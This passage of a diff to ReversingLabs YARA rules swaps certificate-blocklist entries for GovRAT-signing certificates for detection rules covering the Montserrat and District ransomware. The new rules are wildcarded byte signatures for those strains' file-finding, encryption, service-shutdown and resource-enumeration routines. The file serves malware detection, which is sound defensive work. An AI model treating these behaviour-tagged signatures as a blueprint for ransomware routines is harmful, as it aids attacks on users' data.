+            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 F8 ?? 74 ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ??
+            83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 F8 ?? 74
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ??
+            ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83
+            F8 ?? 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ??
+            ?? ?? 83 F8 ?? 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F
+            84 ?? ?? ?? ?? 83 F8 ?? 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
+        }
+		$misc_checks_p2 = {
+            85 C0 0F 84 ?? ?? ?? ?? 83 F8 ?? 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 F8 ?? 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ??
+            ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 F8 ?? 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 F8 ?? 74 ?? 50 E8 ?? ?? ?? ??
+            83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 83 F8 ?? 74 ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ??
+            ?? ?? ?? FF 15 ?? ?? ?? ?? E9
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AFINA Fintek" and pe.signatures [ i ] . serial == "62:af:28:a7:65:7b:a8:ab:10:fa:8e:2d:47:25:0c:69" and 1404172799 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $misc_checks_p* ) ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_04C8Eca7243208A110Dea926C7Ad89Ce : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Montserrat : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing GovRAT malware."
+		description = "Yara rule that detects Montserrat ransomware."
 		author = "ReversingLabs"
-		id = "484d0aa6-0447-5e60-946b-89b01a5e43dd"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "deeb5f1a-1329-5964-93e1-8ca6a20fcd89"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1472-L1488"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Montserrat.yara#L1-L118"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "0012436e83704397026a8b2e500e5d61915e0f4c8ad4100176e200a975562e8f"
+		logic_hash = "c8782a8cb2b87e76ff1f804ee8affd01405827d0914ea725bb0e9ddace7dde10"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Montserrat"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files_p1 = {
+            8B FF 55 8B EC 51 8B 4D ?? 53 57 33 DB 8D 51 ?? 66 8B 01 83 C1 ?? 66 3B C3 75 ?? 8B
+            7D ?? 2B CA D1 F9 83 C8 ?? 41 2B C7 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 56 8D 5F ??
+            03 D9 6A ?? 53 E8 ?? ?? ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ??
+            ?? 83 C4 ?? 85 C0 75 ?? FF 75 ?? 2B DF 8D 04 7E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 85 C0 75 ?? 8B 4D ?? 56 E8 ?? ?? ?? ?? 6A ?? 8B F0 E8 ?? ?? ?? ?? 59 8B C6 5E 5F
+            5B 8B E5 5D C3 33 C0 50 50 50 50 50 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ??
+            ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 55 ?? 8B 4D ?? 53 8B 5D ?? 56 57 6A ?? 5E 6A ??
+            89 95 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 5F EB ?? 0F B7 01 66 3B 85 ?? ?? ??
+            ?? 74 ?? 66 3B C6 74 ?? 66 3B C7 74 ?? 83 E9 ?? 3B CB 75 ?? 0F B7 31 66 3B F7 75 ??
+            8D 43 ?? 3B C8 74 ?? 52 33 FF 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 6A ??
+            8B C6 33 FF 5A 66 3B C2 74 ?? 6A ?? 5A 66 3B C2 74 ?? 6A ?? 5A 66 3B C2 74 ?? 8B C7
+        }
+		$find_files_p2 = {
+            EB ?? 33 C0 40 2B CB 0F B6 C0 D1 F9 41 F7 D8 68 ?? ?? ?? ?? 1B C0 23 C1 89 85 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50
+            57 53 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 ?? 8B 85 ?? ?? ?? ?? 50 57 57 53 E8 ?? ??
+            ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56 FF 15 ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD
+            5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 8D ?? ?? ?? ?? 6A ?? 8B 41 ?? 2B 01 C1 F8 ?? 89 85
+            ?? ?? ?? ?? 58 66 39 85 ?? ?? ?? ?? 75 ?? 66 39 BD ?? ?? ?? ?? 74 ?? 66 39 85 ?? ??
+            ?? ?? 75 ?? 66 39 BD ?? ?? ?? ?? 74 ?? 51 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50
+            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 8B 8D
+            ?? ?? ?? ?? 85 C0 6A ?? 58 75 ?? 8B C1 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 C1 F8
+            ?? 3B C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ??
+            83 C4 ?? E9
+        }
+		$encrypt_files_p1 = {
+            8B FF 55 8B EC 83 EC ?? 53 56 57 FF 75 ?? 8D 45 ?? FF 75 ?? FF 75 ?? 50 E8 ?? ?? ??
+            ?? 83 C4 ?? 8D 7D ?? 8B F0 6A ?? 59 F3 A5 83 CE ?? 39 75 ?? 75 ?? E8 ?? ?? ?? ?? 83
+            20 ?? 8B 45 ?? 89 30 E8 ?? ?? ?? ?? 8B 00 E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 5D ?? 89
+            03 3B C6 75 ?? E8 ?? ?? ?? ?? 83 20 ?? 89 33 E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? EB ??
+            8B 45 ?? 8D 75 ?? 83 65 ?? ?? 33 C9 41 C7 45 ?? ?? ?? ?? ?? 83 EC ?? 89 08 8B 45 ??
+            C1 E8 ?? F7 D0 23 C1 6A ?? 59 89 45 ?? 8B FC 8D 45 ?? 50 FF 75 ?? F3 A5 E8 ?? ?? ??
+            ?? 8B F8 83 C4 ?? 89 7D ?? BA ?? ?? ?? ?? 83 FF ?? 75 ?? 8B 4D ?? 8B C1 23 C2 3B C2
+            75 ?? F6 45 ?? ?? 74 ?? 83 EC ?? 8D 45 ?? 81 E1 ?? ?? ?? ?? 8D 75 ?? 89 4D ?? 6A ??
+            59 8B FC 50 FF 75 ?? F3 A5 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 89 7D ?? 83 FF ?? 75 ?? 8B
+            0B 8B C1 83 E1 ?? C1 F8 ?? 6B C9 ?? 8B 04 85 ?? ?? ?? ?? 80 64 08 ?? ?? FF 15 ?? ??
+            ?? ?? 50 E8 ?? ?? ?? ?? 59 E9 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ??
+            ?? ?? ?? 8B F0 56 E8 ?? ?? ?? ?? 59 8B 0B 8B C1 83 E1 ?? C1 F8 ?? 6B C9 ?? 57 8B 04
+            85 ?? ?? ?? ?? 80 64 08 ?? ?? FF 15 ?? ?? ?? ?? 85 F6 0F 85 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? C7 00 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 F8 ?? 75 ?? 8A 45 ?? 0C ?? EB ?? 83 F8 ?? 8A
+        }
+		$encrypt_files_p2 = {
+            45 ?? 75 ?? 0C ?? 57 FF 33 88 45 ?? E8 ?? ?? ?? ?? 8A 55 ?? 59 59 8B 0B 80 CA ?? 8B
+            C1 88 55 ?? 83 E1 ?? C1 F8 ?? 6B C9 ?? 88 55 ?? 8B 04 85 ?? ?? ?? ?? 88 54 08 ?? 8B
+            0B 8B C1 83 E1 ?? C1 F8 ?? 6B C9 ?? F6 45 ?? ?? 8B 04 85 ?? ?? ?? ?? C6 44 08 ?? ??
+            74 ?? FF 33 E8 ?? ?? ?? ?? 8B F0 59 85 F6 75 ?? 8D 45 ?? C6 45 ?? ?? 50 FF 75 ?? 8D
+            75 ?? 83 EC ?? 6A ?? 59 8B FC FF 33 F3 A5 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8B F0
+            FF 33 E8 ?? ?? ?? ?? 59 8B C6 E9 ?? ?? ?? ?? 8B 03 8B C8 83 E0 ?? C1 F9 ?? 6B D0 ??
+            8A 45 ?? 8B 0C 8D ?? ?? ?? ?? 88 44 11 ?? 8B 0B 8B C1 C1 F8 ?? 83 E1 ?? 6B D1 ?? 8B
+            0C 85 ?? ?? ?? ?? 8B 45 ?? C1 E8 ?? 32 44 11 ?? 24 ?? 30 44 11 ?? F6 45 ?? ?? 75 ??
+            F6 45 ?? ?? 74 ?? 8B 0B 8B C1 83 E1 ?? C1 F8 ?? 6B C9 ?? 8B 04 85 ?? ?? ?? ?? 80 4C
+            08 ?? ?? 8B 75 ?? B9 ?? ?? ?? ?? 8B C6 23 C1 3B C1 0F 85 ?? ?? ?? ?? F6 45 ?? ?? 74
+            ?? FF 75 ?? FF 15 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 81 E6 ?? ?? ?? ?? 89 75 ?? 8D 75 ??
+            6A ?? 59 8B FC 50 FF 75 ?? F3 A5 E8 ?? ?? ?? ?? 8B D0 83 C4 ?? 83 FA ?? 75 ?? FF 15
+            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 0B 8B C1 83 E1 ?? C1 F8 ?? 6B C9 ?? 8B 04 85 ?? ??
+            ?? ?? 80 64 08 ?? ?? FF 33 E8 ?? ?? ?? ?? 59 E9 ?? ?? ?? ?? 8B 0B 8B C1 C1 F8 ?? 83
+            E1 ?? 6B C9 ?? 8B 04 85 ?? ?? ?? ?? 89 54 08 ?? 33 C0 5F 5E 5B 8B E5 5D C3
+        }
+		$shutdown_services_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 65 ?? 8B F9 8B 75 ?? 8B 1D
+            ?? ?? ?? ?? FF D3 83 7E ?? ?? 89 45 ?? 72 ?? 8B 36 6A ?? 56 FF 37 FF 15 ?? ?? ?? ??
+            8B F0 89 75 ?? 85 F6 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 8D 45 ?? 50 6A ?? 56 FF 15
+            ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 75 ?? 56 FF 15 ?? ?? ?? ?? 8B
+            4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2 ??
+            ?? 83 F8 ?? 75 ?? 66 90 FF 77 ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 8D 45 ?? 50 6A
+            ?? 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF D3 2B 45 ?? 3B
+            47 ?? 0F 87 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8B CF E8
+            ?? ?? ?? ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 8B 75 ?? 50 6A ?? 56 FF 15 ?? ?? ?? ?? 85
+            C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 0F 84
+        }
+		$shutdown_services_p2 = {
+            FF 77 ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 8D 45 ?? 50 6A ?? 56 FF 15 ?? ?? ?? ??
+            85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? FF D3 2B 45 ?? 3B 47 ?? 0F 87
+            ?? ?? ?? ?? 83 7D ?? ?? 75 ?? E9 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ??
+            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 E8
+            ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 68
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Open Source Developer, SINGH ADITYA" and pe.signatures [ i ] . serial == "04:c8:ec:a7:24:32:08:a1:10:de:a9:26:c7:ad:89:ce" and 1404172799 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $shutdown_services_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_157C3A4A6Bcf35Cf8453E6B6C0072E1D : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_District : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing GovRAT malware."
+		description = "Yara rule that detects District ransomware."
 		author = "ReversingLabs"
-		id = "4bae3fb2-7e30-598e-8708-b985697bf63a"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "fc6abbc7-66f9-56e6-8106-5f360f25b092"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1490-L1506"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.District.yara#L1-L194"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2a68051ab6d0b967f08e44d91b9f13d75587ea0f16e2a5536ccf5898445e1a58"
+		logic_hash = "9ce395636fd7719f503726df82998e1ac72e9e80fd7a4534bd2251ac9283af38"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "District"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_p1 = {
+            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? 8D 44
+            24 ?? 8B F1 8D 4D ?? 50 E8 ?? ?? ?? ?? 40 C7 44 24 ?? ?? ?? ?? ?? 6A ?? 33 C9 C7 44
+            24 ?? ?? ?? ?? ?? 50 8D 45 ?? 66 89 4C 24 ?? 50 8D 4C 24 ?? E8 ?? ?? ?? ?? 83 EC ??
+            C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 40 C7 84 24 ?? ?? ??
+            ?? ?? ?? ?? ?? 33 C9 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 50 51 8D 45 ?? 66 89 8C 24 ??
+            ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? 8D
+            44 24 ?? 8D 4C 24 ?? 50 E8 ?? ?? ?? ?? 40 C7 44 24 ?? ?? ?? ?? ?? 6A ?? 33 C9 C7 44
+            24 ?? ?? ?? ?? ?? 50 8D 44 24 ?? 66 89 4C 24 ?? 50 8D 4C 24 ?? E8 ?? ?? ?? ?? 83 EC
+            ?? C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 ?? 8D 4C 24 ?? 50 E8 ?? ?? ?? ?? 33 C9 C7 44 24
+            ?? ?? ?? ?? ?? 50 51 8D 44 24 ?? 66 89 4C 24 ?? 50 8D 4C 24 ?? C7 44 24 ?? ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? 6A ?? 50 66 89 44 24 ?? 8D 4C 24 ??
+            8D 45 ?? C7 44 24 ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 6A ?? 56 8D 4C 24 ?? E8 ??
+            ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 6A ?? 0F 43 45 ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68
+            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 0F 84 ?? ?? ?? ?? 6A ?? 57 FF 15 ??
+            ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 66 0F 6E C0 F3 0F E6 C0 C1 E8 ?? F2 0F 58 04 C5
+            ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 56 E8 ?? ?? ?? ?? 56 8B D8
+        }
+		$encrypt_files_p2 = {
+            E8 ?? ?? ?? ?? 83 C4 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 0F 1F 40 ?? 0F 1F 84 00
+            ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 6A ?? A3 ?? ?? ?? ?? 8D 44 24 ?? 50 56
+            53 57 89 0D ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ??
+            FF 15 ?? ?? ?? ?? 56 FF 74 24 ?? 8B D3 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? F7 D8 6A
+            ?? 6A ?? 50 57 FF 15 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 56 FF 74 24 ?? 57 FF 15 ?? ??
+            ?? ?? 83 6C 24 ?? ?? 75 ?? 53 E8 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 57
+            FF 15 ?? ?? ?? ?? 83 7C 24 ?? ?? 8D 4C 24 ?? 8D 45 ?? 0F 43 4C 24 ?? 83 7D ?? ?? 51
+            0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 83 F8 ?? 72 ?? 40 8D 4C 24 ?? 50 FF 74
+            24 ?? E8 ?? ?? ?? ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? 66 89 44 24 ?? 8B 44 24 ?? C7 44
+            24 ?? ?? ?? ?? ?? 83 F8 ?? 72 ?? 40 8D 4C 24 ?? 50 FF 74 24 ?? E8 ?? ?? ?? ?? 33 C0
+            C7 44 24 ?? ?? ?? ?? ?? 66 89 44 24 ?? 8B 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 83 F8 ??
+            72 ?? 40 8D 4C 24 ?? 50 FF 74 24 ?? E8 ?? ?? ?? ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? 66
+            89 44 24 ?? 8B 84 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 83 F8 ?? 72 ?? 40 8D 4C 24
+            ?? 50 FF 74 24 ?? E8 ?? ?? ?? ?? 33 C0 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 44 24
+            ?? 8B 44 24 ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 83 F8 ?? 72 ?? 40 8D 4C 24 ?? 50 FF
+            74 24 ?? E8 ?? ?? ?? ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? 66 89 44 24 ?? 89 44 24 ?? 8B
+            45 ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 77 ?? 03 C0 3D ?? ?? ?? ?? 72 ?? F6
+            C1 ?? 75 ?? 8B 41 ?? 3B C1 73 ?? 2B C8 83 F9 ?? 72 ?? 83 F9 ?? 77 ?? 8B C8 51 E8 ??
+            ?? ?? ?? 83 C4 ?? 5F 5E 5B 8B E5 5D C2
+        }
+		$find_files = {
+            53 55 56 57 6A ?? 8B F1 E8 ?? ?? ?? ?? 83 C4 ?? 8D 9E ?? ?? ?? ?? 8B E8 53 68 ?? ??
+            ?? ?? FF 15 ?? ?? ?? ?? 53 50 89 45 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D BE ?? ?? ??
+            ?? 0F 1F 80 ?? ?? ?? ?? F6 03 ?? 57 74 ?? 8B CE E8 ?? ?? ?? ?? 84 C0 75 ?? 57 E8 ??
+            ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 50 8B CE E8 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? 84 C0 74
+            ?? 8B CE E8 ?? ?? ?? ?? 53 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 80 7C 24 ?? ?? 75
+            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 55 E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E 5D
+            5B C2
+        }
+		$enum_resources_1_p1 = {
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 55 56 57 33 C0 C7 44 24 ?? ?? ?? ?? ?? 66 89 44 24
+            ?? 8B DA 8D 44 24 ?? 89 5C 24 ?? 50 51 6A ?? 6A ?? 6A ?? C7 44 24 ?? ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 85 C0 74 ?? 3D ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ??
+            50 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? BE ?? ??
+            ?? ?? E9 ?? ?? ?? ?? 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? 50 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 3D
+            ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 84 24 ??
+            ?? ?? ?? 50 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? BE ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 ED 89
+            6C 24 ?? 39 6C 24 ?? 0F 86 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 85 DB 0F 8E ?? ?? ?? ?? C1
+            E5 ?? 8B F3 89 6C 24 ?? 89 5C 24 ?? 0F 1F 84 00 ?? ?? ?? ?? 83 BC 2C ?? ?? ?? ?? ??
+            0F 85 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 74 ?? 8B 84 2C ?? ?? ?? ?? 66 83 78 ?? ?? 8D
+            50 ?? 74 ?? 8D B4 24 ?? ?? ?? ?? 8D 48 ?? 8A 01 8D 52 ?? 88 06 8D 76 ?? 66 83 3A
+        }
+		$enum_resources_1_p2 = {
+            8D 49 ?? 75 ?? 8B 74 24 ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50
+            6A ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B4 2C ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50
+            E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 6A ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
+            ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 44 24 ?? FF 70 ?? 8B 40 ?? 83 E0 ?? 50 8D 84 24 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 74 24 ?? 83 C4 ?? C6 44 24 ?? ?? 8B 56 ??
+            F6 C2 ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66
+            A1 ?? ?? ?? ?? 66 89 41 ?? F6 C2 ?? 74 ?? 8D 4C 24 ?? 49 0F 1F 44 00 ?? 8A 41 ?? 8D
+            49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? A0 ?? ?? ?? ??
+            88 41 ?? F6 C2 ?? 74 ?? 8D 4C 24 ?? 49 0F 1F 00 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ??
+            ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 89 41 ?? 66 A1 ?? ?? ?? ?? 66 89 41 ?? A0 ?? ?? ?? ??
+            88 41 ?? F6 C2 ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ??
+            89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? F6 C2 ?? 74 ?? 8D 4C 24 ?? 49 66 0F 1F 44 00 ??
